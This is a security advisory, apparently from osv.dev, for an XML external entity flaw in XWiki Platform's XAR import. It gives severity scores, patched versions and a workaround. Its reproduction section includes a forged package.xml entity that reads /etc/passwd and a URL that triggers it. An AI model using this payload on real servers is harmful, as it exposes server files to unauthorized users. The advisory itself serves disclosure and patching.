XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference

2023-03-0817:19:30

Google

osv.dev

xwiki platform

data leak

xml external entity

vulnerability

patch

workaround

security advisory

jira xwiki.org

security mailing list

7.7 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

0.001 Low

EPSS

Percentile

40.4%

JSON

Impact

Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.

Example to reproduce:

Create a forget XAR file and inside it, have the following package.xml content:

&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt;

&lt;package&gt;
&lt;infos&gt;
&lt;name&gt;&xxe;&lt;/name&gt;
&lt;description&gt; &xxe; Helper pages for creating and listing Class/Template/Sheets&lt;/description&gt;
&lt;licence&gt;&lt;/licence&gt;
&lt;author&gt;XWiki.Admin&lt;/author&gt;
...

Upload it onto a wiki page (e.g. XXE) as an attachment (e.g. test.xar).
Call the page using http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar

You’ll then notice that the displayed UI contains the content of the /etc/passwd file.

Patches

The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.

Workarounds

You’d need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the XarPackage java class and then copy the modified version to your WEB-INF/classes directory (or rebuild the xwiki-platform-xar-model maven module and replace the one found in WEB-INF/lib/).